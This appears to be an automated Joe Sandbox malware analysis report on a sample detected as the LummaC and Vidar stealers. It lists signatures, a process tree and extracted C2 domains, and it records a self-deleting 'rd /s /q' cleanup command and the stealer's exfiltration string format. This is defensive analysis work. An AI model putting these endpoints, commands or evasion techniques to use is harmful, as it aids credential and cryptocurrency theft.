Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524997
MD5:c9784db0c88a05a8aae9ddb7289b51db
SHA1:7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
SHA256:fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C9784DB0C88A05A8AAE9DDB7289B51DB)
    • MSBuild.exe (PID: 3404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 3832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • CBFCFBFBFB.exe (PID: 900 cmdline: "C:\ProgramData\CBFCFBFBFB.exe" MD5: 49504D08DC10AECA7D36605D6A20BDE0)
        • MSBuild.exe (PID: 3068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 4520 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • MSBuild.exe (PID: 5276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 3640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 3424 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6864 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.638ad8.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.638ad8.1.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    0.2.file.exe.638ad8.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.file.exe.638ad8.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        4.2.MSBuild.exe.400000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 5 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Silenttrinity Stager Msbuild Activity
                          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 104.102.49.254, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3832, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49712

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:14:36.299028+020020287653Unknown Traffic192.168.2.84971349.12.197.9443TCP
                          2024-10-03T15:14:37.689850+020020287653Unknown Traffic192.168.2.84971449.12.197.9443TCP
                          2024-10-03T15:14:39.062524+020020287653Unknown Traffic192.168.2.84971549.12.197.9443TCP
                          2024-10-03T15:14:40.417792+020020287653Unknown Traffic192.168.2.85623749.12.197.9443TCP
                          2024-10-03T15:14:41.775560+020020287653Unknown Traffic192.168.2.85623849.12.197.9443TCP
                          2024-10-03T15:14:43.192813+020020287653Unknown Traffic192.168.2.85623949.12.197.9443TCP
                          2024-10-03T15:14:44.196910+020020287653Unknown Traffic192.168.2.85624049.12.197.9443TCP
                          2024-10-03T15:14:47.406735+020020287653Unknown Traffic192.168.2.85624149.12.197.9443TCP
                          2024-10-03T15:14:48.495165+020020287653Unknown Traffic192.168.2.85624249.12.197.9443TCP
                          2024-10-03T15:14:49.627817+020020287653Unknown Traffic192.168.2.85624449.12.197.9443TCP
                          2024-10-03T15:14:50.758435+020020287653Unknown Traffic192.168.2.85624549.12.197.9443TCP
                          2024-10-03T15:14:52.456117+020020287653Unknown Traffic192.168.2.85624749.12.197.9443TCP
                          2024-10-03T15:14:54.320488+020020287653Unknown Traffic192.168.2.85624949.12.197.9443TCP
                          2024-10-03T15:14:55.857897+020020287653Unknown Traffic192.168.2.85625049.12.197.9443TCP
                          2024-10-03T15:14:57.290766+020020287653Unknown Traffic192.168.2.85625149.12.197.9443TCP
                          2024-10-03T15:14:58.538988+020020287653Unknown Traffic192.168.2.85625249.12.197.9443TCP
                          2024-10-03T15:15:01.488986+020020287653Unknown Traffic192.168.2.85625349.12.197.9443TCP
                          2024-10-03T15:15:02.867487+020020287653Unknown Traffic192.168.2.85625449.12.197.9443TCP
                          2024-10-03T15:15:04.205708+020020287653Unknown Traffic192.168.2.85625549.12.197.9443TCP
                          2024-10-03T15:15:05.605832+020020287653Unknown Traffic192.168.2.85625649.12.197.9443TCP
                          2024-10-03T15:15:07.639807+020020287653Unknown Traffic192.168.2.85625749.12.197.9443TCP
                          2024-10-03T15:15:09.807815+020020287653Unknown Traffic192.168.2.85625849.12.197.9443TCP
                          2024-10-03T15:15:18.459716+020020287653Unknown Traffic192.168.2.85626249.12.197.9443TCP
                          2024-10-03T15:15:20.848335+020020287653Unknown Traffic192.168.2.85626549.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:21.246548+020020546531A Network Trojan was detected192.168.2.856266172.67.166.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:21.246548+020020498361A Network Trojan was detected192.168.2.856266172.67.166.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:22.702271+020020544951A Network Trojan was detected192.168.2.85626845.132.206.25180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.058566+020020563921Domain Observed Used for C2 Detected192.168.2.8545461.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.125505+020020563941Domain Observed Used for C2 Detected192.168.2.8507321.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.069567+020020563961Domain Observed Used for C2 Detected192.168.2.8630601.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.113568+020020564001Domain Observed Used for C2 Detected192.168.2.8558651.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.029568+020020564021Domain Observed Used for C2 Detected192.168.2.8542121.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.101598+020020564061Domain Observed Used for C2 Detected192.168.2.8611211.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.018253+020020564081Domain Observed Used for C2 Detected192.168.2.8524481.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:18.080581+020020564101Domain Observed Used for C2 Detected192.168.2.8595511.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:14:41.119899+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.856237TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:14:42.473975+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.856238TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:14:41.119683+020020490871A Network Trojan was detected192.168.2.85623749.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T15:15:15.774920+020028032702Potentially Bad Traffic192.168.2.856259147.45.44.10480TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                          Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                          Found malware configuration
                          Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
                          Source: 16.2.MSBuild.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exeJoe Sandbox ML: detected
                          Source: C:\ProgramData\CBFCFBFBFB.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: absorptioniw.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: mysterisop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: snarlypagowo.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: treatynreit.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: chorusarorp.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: abnomalrkmu.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: soldiefieop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: questionsmw.stor
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: soldiefieop.site
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: Workgroup: -
                          Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmpString decryptor: H8NgCl--
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,4_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C896C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C896C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C9EA9A0
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                          Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                          Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
                          Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062735B FindFirstFileExW,0_2_0062735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,4_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040CD37
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B0735B FindFirstFileExW,13_2_00B0735B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_00639385
                          Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_00639385
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]4_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax4_2_004014AD
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4A08D
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx esi, byte ptr [edx+eax-01h]13_2_00B240E8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]13_2_00B240E8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 4x nop then mov byte ptr [edi], al13_2_00B4A004
